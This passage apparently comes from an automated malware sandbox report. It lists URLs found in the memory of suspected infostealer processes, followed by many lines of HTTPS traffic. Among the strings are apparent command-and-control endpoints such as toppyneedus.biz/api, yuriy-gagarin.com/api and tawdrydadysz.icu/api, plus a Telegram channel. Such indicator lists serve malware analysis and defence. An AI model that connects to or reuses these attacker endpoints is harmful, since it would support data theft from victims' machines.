Source: Appeal.com, 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2710563523.0000000004D5E000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sc1phell
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tawdrydadysz.icu:443/api
Source: BitLockerToGo.exe, 0000001E.00000002.4194384457.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/
Source: BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000961000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2601996633.0000000000961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz//y
Source: BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000986000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2800188823.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000002.4194666050.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000961000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2751439915.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2911214282.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2734739475.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636793987.000000000099C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2733421322.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2601996633.0000000000961000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3612356406.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2755146103.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/api
Source: BitLockerToGo.exe, 0000001E.00000002.4190061944.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3612356406.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/api(
Source: BitLockerToGo.exe, 0000001E.00000003.2776773683.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2773803169.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2884907342.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2979336746.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3610012998.0000000004CC2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2762987295.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2751439915.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2911214282.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2802884657.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2853597666.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000002.4194384457.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/apiAAA=k
Source: BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000986000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636793987.000000000099C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/apiN
Source: BitLockerToGo.exe, 0000001E.00000003.2762987295.0000000004CCA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2911571176.0000000004CCA000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2800188823.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000002.4194666050.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2751439915.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2911214282.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2755146103.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/apizk
Source: BitLockerToGo.exe, 0000001E.00000003.2776773683.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2773803169.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2884907342.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2979336746.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3610012998.0000000004CC2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2762987295.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2751439915.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2911214282.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2802884657.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2853597666.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000002.4194384457.0000000004CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/f
Source: BitLockerToGo.exe, 0000001E.00000003.2601996633.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/m
Source: BitLockerToGo.exe, 0000001E.00000003.2851017991.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/ms
Source: BitLockerToGo.exe, 0000001E.00000002.4190061944.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000986000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2851017991.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636793987.000000000099C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3612356406.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/pi
Source: BitLockerToGo.exe, 0000001E.00000003.2636600008.0000000000986000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2636793987.000000000099C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/pis
Source: BitLockerToGo.exe, 0000001E.00000002.4190061944.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.3612356406.00000000009F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz/v
Source: BitLockerToGo.exe, 0000001E.00000003.2904108811.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz:443/api
Source: BitLockerToGo.exe, 0000001E.00000003.2601996633.0000000000978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://toppyneedus.biz:443/apiH
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D5D000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3602824876.0000000001C23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 2328527160.exe, 00000018.00000002.2697987021.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2737359960.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: skotes.exe, 00000006.00000002.4195698954.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: c90cec6187.exe, 00000022.00000003.2688627644.0000000002031000.00000004.00001000.00020000.00000000.sdmp, c90cec6187.exe, 00000022.00000002.4187677390.0000000002031000.00000004.00001000.00020000.00000000.sdmp, c90cec6187.exe, 00000022.00000003.2688481847.0000000002340000.00000004.00001000.00020000.00000000.sdmp, c90cec6187.tmp, 00000023.00000002.4186908764.0000000000562000.00000004.00000020.00020000.00000000.sdmp, c90cec6187.tmp, 00000023.00000003.2692801670.0000000002048000.00000004.00001000.00020000.00000000.sdmp, c90cec6187.tmp, 00000023.00000003.2692714536.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, c90cec6187.tmp, 00000023.00000002.4190956981.0000000002048000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.easycutstudio.com/support.html
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2679423027.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2669296954.000000000571B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671334503.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671496757.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738624518.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738082890.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Appeal.com, 00000014.00000002.3672354873.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, Appeal.com, 00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2737359960.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: skotes.exe, 00000006.00000002.4195698954.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.4192805438.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Appeal.com, 00000014.00000002.3649929650.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2679423027.0000000005718000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2669296954.000000000571B000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671334503.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2671496757.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738624518.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2738082890.0000000005D4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Appeal.com, 00000014.00000002.3806418724.0000000007065000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2736864384.00000000057FE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2736951401.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Appeal.com, 00000014.00000002.3806418724.0000000007065000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2736864384.00000000057FE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001E.00000003.2736951401.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2796948258.0000000005E26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 8a7032211b.exe, 0000001D.00000003.2625969981.000000000112F000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2622943475.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719047505.0000000001238000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2718908519.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 714ab8b5fd.exe, 00000021.00000003.2719502012.00000000011F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/
Source: 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719502012.00000000011F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/&0dt
Source: 714ab8b5fd.exe, 00000021.00000003.2718981148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2719502012.00000000011F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/1
Source: 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/69Q
Source: 8a7032211b.exe, 0000001D.00000003.2822878361.000000000112C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2904591870.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2818712020.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2849533277.000000000113B000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3016669605.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2892711134.000000000113B000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2824746830.000000000112C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000002.3136689359.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2839921186.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/a
Source: 714ab8b5fd.exe, 00000021.00000003.2719502012.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2974103105.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203782125.000000000123A000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3153277151.0000000001233000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api
Source: 714ab8b5fd.exe, 00000021.00000002.3208280937.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3118520090.0000000005D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api%
Source: 714ab8b5fd.exe, 00000021.00000003.2776263842.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2789319314.0000000005D06000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D0E000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2791758398.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api0h
Source: 8a7032211b.exe, 0000001D.00000002.3136689359.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3016669605.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3031288673.0000000001143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api1W
Source: 8a7032211b.exe, 0000001D.00000003.2709303604.00000000056E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api3R
Source: 714ab8b5fd.exe, 00000021.00000002.3208280937.0000000005D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/api9
Source: 8a7032211b.exe, 0000001D.00000003.2751216336.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2754652769.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2754951081.00000000056DC000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2768698526.00000000056E0000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2762160687.00000000056E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apiHOl7
Source: 8a7032211b.exe, 0000001D.00000003.2709303604.00000000056E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apiHwgu
Source: 714ab8b5fd.exe, 00000021.00000003.2762220411.0000000005D0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apiYa
Source: 8a7032211b.exe, 0000001D.00000003.2942238747.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2941985948.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apiZ
Source: 8a7032211b.exe, 0000001D.00000002.3136689359.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3016669605.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.3031288673.0000000001143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apicWq
Source: 8a7032211b.exe, 0000001D.00000003.2839692761.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2942238747.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2941985948.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2880216741.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apieS
Source: 8a7032211b.exe, 0000001D.00000002.3320531290.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apifd/
Source: 714ab8b5fd.exe, 00000021.00000003.3118520090.0000000005D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apii
Source: 714ab8b5fd.exe, 00000021.00000003.3179527450.0000000001239000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203782125.000000000123A000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3153277151.0000000001233000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apim
Source: 714ab8b5fd.exe, 00000021.00000003.2776263842.0000000005D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apios
Source: 8a7032211b.exe, 0000001D.00000002.3320531290.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/apip
Source: 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000003.2625706107.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/f9
Source: 8a7032211b.exe, 0000001D.00000003.3016669605.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 8a7032211b.exe, 0000001D.00000002.3136689359.000000000113C000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3203617051.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3161371476.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/l
Source: 714ab8b5fd.exe, 00000021.00000003.2776263842.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000002.3208280937.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2789319314.0000000005D06000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2801001336.0000000005D0E000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2791758398.0000000005D09000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3118520090.0000000005D01000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2829329796.0000000005D0C000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2830406395.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2762220411.0000000005D0E000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2770630572.0000000005D0E000.00000004.00000800.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.2974103105.0000000005D10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/naDbPq
Source: 8a7032211b.exe, 0000001D.00000003.2647791506.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com/v:
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com:443/api
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com:443/apiEE
Source: 8a7032211b.exe, 0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com:443/apiExtensibility
Source: 714ab8b5fd.exe, 00000021.00000002.3203098515.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 714ab8b5fd.exe, 00000021.00000003.3170722424.00000000011B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yuriy-gagarin.com:443/apitxtPK

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59709
Source: unknown	Network traffic detected: HTTP traffic on port 59861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59823
Source: unknown	Network traffic detected: HTTP traffic on port 59781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59796
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 59864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59835
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59834
Source: unknown	Network traffic detected: HTTP traffic on port 59792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59842
Source: unknown	Network traffic detected: HTTP traffic on port 59832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59848
Source: unknown	Network traffic detected: HTTP traffic on port 59857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59729
Source: unknown	Network traffic detected: HTTP traffic on port 59741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59843
Source: unknown	Network traffic detected: HTTP traffic on port 59729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59851
Source: unknown	Network traffic detected: HTTP traffic on port 59801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59853
